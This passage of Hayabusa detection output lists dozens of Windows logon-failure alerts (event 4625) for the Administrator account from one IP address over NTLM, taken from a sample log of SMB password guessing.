NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: 